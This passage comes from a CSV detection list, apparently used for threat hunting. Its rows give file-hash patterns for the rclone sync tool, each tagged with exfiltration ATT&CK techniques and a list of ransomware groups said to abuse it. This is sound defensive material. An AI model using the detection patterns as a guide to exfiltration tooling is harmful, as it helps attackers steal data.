"*546d13242dd655fc2d405892c30adad1a6cc071b77a5779fc8f4bb0614595d85*",".{0,1000}546d13242dd655fc2d405892c30adad1a6cc071b77a5779fc8f4bb0614595d85.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*546f10834f36cb9596b23e7ed2551c6ea485f3bdef9dd2475b840eb95894e1d8*",".{0,1000}546f10834f36cb9596b23e7ed2551c6ea485f3bdef9dd2475b840eb95894e1d8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5490ece8bcd8e5f083b72bd48614d6945e460f8dc8c9aa8e9db0cac54f8568f0*",".{0,1000}5490ece8bcd8e5f083b72bd48614d6945e460f8dc8c9aa8e9db0cac54f8568f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*54bcac89bc7735d425b3b86f8fee042566e6f02ab69feba29bafcffeec072b20*",".{0,1000}54bcac89bc7735d425b3b86f8fee042566e6f02ab69feba29bafcffeec072b20.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*54f263712d02bf2345eb5a3444aa4f07b990f5b4c6d02f1de892d1ff8028b50c*",".{0,1000}54f263712d02bf2345eb5a3444aa4f07b990f5b4c6d02f1de892d1ff8028b50c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*55af8b379dafa474233959948f4daf6bcdf49c03dff322c2e4032e2db394fad0*",".{0,1000}55af8b379dafa474233959948f4daf6bcdf49c03dff322c2e4032e2db394fad0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*56408aa221735b093510a8ea124b7b54df6054c70e8970f833373515595c3c8d*",".{0,1000}56408aa221735b093510a8ea124b7b54df6054c70e8970f833373515595c3c8d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5664616dada91457f2e4241e69105952b97e4ffce83b030ac1c0f459799e76e9*",".{0,1000}5664616dada91457f2e4241e69105952b97e4ffce83b030ac1c0f459799e76e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*56754f477bd8f5415c5b0f26346928a698bcc7c6665d72fe2fe746c3b36bccb0*",".{0,1000}56754f477bd8f5415c5b0f26346928a698bcc7c6665d72fe2fe746c3b36bccb0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*56af38e429f5b4ddb7e23875122dac06e86f71414251f989bd096cbbc836c3e8*",".{0,1000}56af38e429f5b4ddb7e23875122dac06e86f71414251f989bd096cbbc836c3e8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*56dfd0968ae9298d36c94c063639d5c33ae44224a4a51fe4da9c3596dea16d10*",".{0,1000}56dfd0968ae9298d36c94c063639d5c33ae44224a4a51fe4da9c3596dea16d10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*56f4432c2a798eb5b37fb6d93bbd2b0dfaf40e73b82e3fbf5e40e8e23cb24411*",".{0,1000}56f4432c2a798eb5b37fb6d93bbd2b0dfaf40e73b82e3fbf5e40e8e23cb24411.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5721a43731c1472216f3005efaf5a9e298ac2c9d40c4b55e68fe9ae5692c48b3*",".{0,1000}5721a43731c1472216f3005efaf5a9e298ac2c9d40c4b55e68fe9ae5692c48b3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*575d5c5a96d166ad29c143689914c8879e3b221f77a6394401572857d4c47a1f*",".{0,1000}575d5c5a96d166ad29c143689914c8879e3b221f77a6394401572857d4c47a1f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*575e1d6d536f108f69b6819153087396e08464cfb316fe6caadfb85fcbd79d13*",".{0,1000}575e1d6d536f108f69b6819153087396e08464cfb316fe6caadfb85fcbd79d13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5764a26b8264e91df0c05734703091f170a3b54b91c75e759144477b992f6d5b*",".{0,1000}5764a26b8264e91df0c05734703091f170a3b54b91c75e759144477b992f6d5b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*57686610f48447abf26f273f9a45fd26b76072d0894eabe073c1fe41dce4b5d4*",".{0,1000}57686610f48447abf26f273f9a45fd26b76072d0894eabe073c1fe41dce4b5d4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*576a8db5b58802c8e1e345992fc348cedbf88e6c1fbe73733a5c7b5ad15b6179*",".{0,1000}576a8db5b58802c8e1e345992fc348cedbf88e6c1fbe73733a5c7b5ad15b6179.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*57732d0896ef1f328a07db06da39b1fae33ed0357a2003d662b2293f500bd956*",".{0,1000}57732d0896ef1f328a07db06da39b1fae33ed0357a2003d662b2293f500bd956.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*586553898cc1e9e1f3198d7a0c5d84a34ca4709a35013954a3e648f09e65aa37*",".{0,1000}586553898cc1e9e1f3198d7a0c5d84a34ca4709a35013954a3e648f09e65aa37.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*58656a39bbc9b0783409bf1bb86c17591e16b49158deac844de7ddddeea1374f*",".{0,1000}58656a39bbc9b0783409bf1bb86c17591e16b49158deac844de7ddddeea1374f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5905b6c9baf13f679341eacf487f13d70d49b43e71c3d9dde099fb0f21bfe02a*",".{0,1000}5905b6c9baf13f679341eacf487f13d70d49b43e71c3d9dde099fb0f21bfe02a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*590d4460b86bb3ce31fbe5b9089ba75315062f7ba0cb018edd14f3a694e80d2e*",".{0,1000}590d4460b86bb3ce31fbe5b9089ba75315062f7ba0cb018edd14f3a694e80d2e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*59554c5966d4d1c5d8d16235cca887de9c96211e5080766642f67081856f8453*",".{0,1000}59554c5966d4d1c5d8d16235cca887de9c96211e5080766642f67081856f8453.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5a0e13e12f2c0091e1705f652a830e95b733b3d9c111b2765728d77d8e1044cb*",".{0,1000}5a0e13e12f2c0091e1705f652a830e95b733b3d9c111b2765728d77d8e1044cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5a2a70b546bff92253c289e56d19746ee64a3944d14b6afa833e9991035ca18c*",".{0,1000}5a2a70b546bff92253c289e56d19746ee64a3944d14b6afa833e9991035ca18c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5a93f69793e4cc75fc1670a79d91a52fe5f10386e355e14593df0322e70436e9*",".{0,1000}5a93f69793e4cc75fc1670a79d91a52fe5f10386e355e14593df0322e70436e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5adb4c5fe0675627461000a63156001301ec7cade966c55c8c4ebcfaeb62c5ae*",".{0,1000}5adb4c5fe0675627461000a63156001301ec7cade966c55c8c4ebcfaeb62c5ae.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5aeed3259b4eb939caaa942220100f05e3f52ca92eb24eb5e3afbba02dc702d9*",".{0,1000}5aeed3259b4eb939caaa942220100f05e3f52ca92eb24eb5e3afbba02dc702d9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5afe89b3106bcaeff0d314414f4e06de24643dd161b2ecf5a72a602115d2404d*",".{0,1000}5afe89b3106bcaeff0d314414f4e06de24643dd161b2ecf5a72a602115d2404d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5aff1db3460b4328a757445d54833c5f89b7a38725982e0f7c84ce0975cc60d4*",".{0,1000}5aff1db3460b4328a757445d54833c5f89b7a38725982e0f7c84ce0975cc60d4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5b0df831f2bc06c6eaed5c6fd4d109044aa74463465dfce792c64962f2512ac2*",".{0,1000}5b0df831f2bc06c6eaed5c6fd4d109044aa74463465dfce792c64962f2512ac2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5b17f4c89bc1da1563f8d8f68383de6e80b43fc71c57ea97ba27530536592f6e*",".{0,1000}5b17f4c89bc1da1563f8d8f68383de6e80b43fc71c57ea97ba27530536592f6e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5b27422ee31eae2baaae829f40587c82342d6539aa84886b24af48c33fb1724a*",".{0,1000}5b27422ee31eae2baaae829f40587c82342d6539aa84886b24af48c33fb1724a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5b550c4dc2a7eb2591bd6a2fb4f6b17ea9853ca704c688684f48cc8d32a99f2a*",".{0,1000}5b550c4dc2a7eb2591bd6a2fb4f6b17ea9853ca704c688684f48cc8d32a99f2a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*5b79752442c96dcf99703efaf74cdf828a4c2fbc805f5352ab77c9ccd40ae47a*",".{0,1000}5b79752442c96dcf99703efaf74cdf828a4c2fbc805f5352ab77c9ccd40ae47a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
